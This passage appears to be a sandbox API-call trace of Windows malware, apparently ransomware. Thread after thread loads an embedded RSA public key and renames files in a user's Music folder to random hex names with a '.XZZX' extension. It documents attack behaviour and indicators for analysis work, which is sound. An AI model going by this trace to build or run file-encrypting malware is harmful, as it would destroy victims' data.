lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX") returned="38DC595E3788A5BA7503B1493BA98A02.XZZX" [0243.865] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x7460c63b, Data2=0xa175, Data3=0x47ec, Data4=([0]=0x9a, [1]=0x5e, [2]=0x14, [3]=0xc5, [4]=0x41, [5]=0x1a, [6]=0xe4, [7]=0x27))) returned 0x0 [0243.865] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\38DC595E3788A5BA7503B1493BA98A02.XZZX") returned 110 [0243.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0243.866] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\0CE5B3F72D5C4ADC7460C63B30172F24.XZZX") returned 110 [0243.866] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 972 os_tid = 0x1238 [0244.021] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.021] lstrcpyW (in: lpString1=0x2baf460, lpString2="3C85A2C827B882D0AC42F6272BD96718.XZZX" | out: lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX") returned="3C85A2C827B882D0AC42F6272BD96718.XZZX" [0244.021] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.021] SetErrorMode (uMode=0x1) returned 0x1 [0244.021] lstrcpyW (in: lpString1=0x2baf860, lpString2="3C85A2C827B882D0AC42F6272BD96718.XZZX" | out: lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX") returned="3C85A2C827B882D0AC42F6272BD96718.XZZX" [0244.021] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x3b2efa14, Data2=0x7450, Data3=0x4785, Data4=([0]=0x8b, [1]=0x4f, [2]=0x12, [3]=0xde, [4]=0xb2, [5]=0x9e, [6]=0xa2, [7]=0x6b))) returned 0x0 [0244.022] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\3C85A2C827B882D0AC42F6272BD96718.XZZX") returned 110 [0244.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0244.022] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\C7FF3640207E9D903B2EFA14233981D8.XZZX") returned 110 [0244.022] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 973 os_tid = 0x123c [0244.177] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.177] lstrcpyW (in: lpString1=0x2baf460, lpString2="64527B001382D7BF4D0A170017B7BC07.XZZX" | out: lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX") returned="64527B001382D7BF4D0A170017B7BC07.XZZX" [0244.177] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.177] SetErrorMode (uMode=0x1) returned 0x1 [0244.177] lstrcpyW (in: lpString1=0x2baf860, lpString2="64527B001382D7BF4D0A170017B7BC07.XZZX" | out: lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX") returned="64527B001382D7BF4D0A170017B7BC07.XZZX" [0244.177] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x1b78146b, Data2=0x7a2a, Data3=0x484d, Data4=([0]=0xb9, [1]=0x26, [2]=0xbb, [3]=0x4d, [4]=0xba, [5]=0x1f, [6]=0xbc, [7]=0xbe))) returned 0x0 [0244.178] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\64527B001382D7BF4D0A170017B7BC07.XZZX") returned 110 [0244.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0244.178] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BB6E578E22808EA21B78146B253B72EA.XZZX") returned 110 [0244.178] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 974 os_tid = 0x1240 [0244.333] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.333] lstrcpyW (in: lpString1=0x2baf460, lpString2="663067DE2A526ACA340DE0352E734F12.XZZX" | out: lpString1="663067DE2A526ACA340DE0352E734F12.XZZX") returned="663067DE2A526ACA340DE0352E734F12.XZZX" [0244.333] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.333] SetErrorMode (uMode=0x1) returned 0x1 [0244.334] lstrcpyW (in: lpString1=0x2baf860, lpString2="663067DE2A526ACA340DE0352E734F12.XZZX" | out: lpString1="663067DE2A526ACA340DE0352E734F12.XZZX") returned="663067DE2A526ACA340DE0352E734F12.XZZX" [0244.334] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x172cf493, Data2=0x9e2e, Data3=0x4715, Data4=([0]=0xbc, [1]=0xd5, [2]=0x87, [3]=0x8e, [4]=0xf2, [5]=0xfb, [6]=0xf7, [7]=0xf1))) returned 0x0 [0244.334] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\663067DE2A526ACA340DE0352E734F12.XZZX") returned 110 [0244.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0244.334] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\E906AC6A2BEBBBC6172CF4932EA6A00E.XZZX") returned 110 [0244.334] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 975 os_tid = 0x1244 [0244.489] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.489] lstrcpyW (in: lpString1=0x2baf460, lpString2="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" | out: lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" [0244.489] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.489] SetErrorMode (uMode=0x1) returned 0x1 [0244.489] lstrcpyW (in: lpString1=0x2baf860, lpString2="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" | out: lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" [0244.489] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x73608459, Data2=0x22f7, Data3=0x4167, Data4=([0]=0x89, [1]=0xaa, [2]=0xcc, [3]=0x86, [4]=0x47, [5]=0xb5, [6]=0x92, [7]=0xe2))) returned 0x0 [0244.489] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned 110 [0244.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0244.490] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\23B383DF08EEC861736084590BA9ACA9.XZZX") returned 110 [0244.490] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 976 os_tid = 0x1248 [0244.645] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.645] lstrcpyW (in: lpString1=0x2baf460, lpString2="83899D5A26F059DE25E7413F2B253E26.XZZX" | out: lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX") returned="83899D5A26F059DE25E7413F2B253E26.XZZX" [0244.645] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.645] SetErrorMode (uMode=0x1) returned 0x1 [0244.646] lstrcpyW (in: lpString1=0x2baf860, lpString2="83899D5A26F059DE25E7413F2B253E26.XZZX" | out: lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX") returned="83899D5A26F059DE25E7413F2B253E26.XZZX" [0244.646] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x2a2b30cf, Data2=0xeb94, Data3=0x4e74, Data4=([0]=0xb1, [1]=0xca, [2]=0x3d, [3]=0xe6, [4]=0xa2, [5]=0x15, [6]=0xaf, [7]=0x36))) returned 0x0 [0244.646] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\83899D5A26F059DE25E7413F2B253E26.XZZX") returned 110 [0244.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0244.646] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\06C63CAC4831D7102A2B30CF4AECBB58.XZZX") returned 110 [0244.646] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 977 os_tid = 0x124c [0244.801] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.801] lstrcpyW (in: lpString1=0x2baf460, lpString2="B7D698FE122EFCA3A766339E164FE0EB.XZZX" | out: lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned="B7D698FE122EFCA3A766339E164FE0EB.XZZX" [0244.801] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.801] SetErrorMode (uMode=0x1) returned 0x1 [0244.801] lstrcpyW (in: lpString1=0x2baf860, lpString2="B7D698FE122EFCA3A766339E164FE0EB.XZZX" | out: lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned="B7D698FE122EFCA3A766339E164FE0EB.XZZX" [0244.801] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x32f2171d, Data2=0xa91c, Data3=0x4422, Data4=([0]=0x92, [1]=0x6a, [2]=0x9e, [3]=0x67, [4]=0xb8, [5]=0xe7, [6]=0xde, [7]=0x43))) returned 0x0 [0244.801] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned 110 [0244.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0244.802] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\63BCAC2C2D01E5B832F2171D2FBCCA00.XZZX") returned 110 [0244.802] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 978 os_tid = 0x1250 [0244.957] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.957] lstrcpyW (in: lpString1=0x2baf460, lpString2="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" | out: lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" [0244.957] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.957] SetErrorMode (uMode=0x1) returned 0x1 [0244.957] lstrcpyW (in: lpString1=0x2baf860, lpString2="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" | out: lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" [0244.957] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xac4db6c6, Data2=0xe6ff, Data3=0x4508, Data4=([0]=0xbd, [1]=0x74, [2]=0x2, [3]=0x90, [4]=0x92, [5]=0x85, [6]=0x4c, [7]=0x6f))) returned 0x0 [0244.957] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned 110 [0244.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0244.957] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\739EF33A3E49F2F8AC4DB6C64104D740.XZZX") returned 110 [0244.958] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 979 os_tid = 0x1254 [0245.113] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW 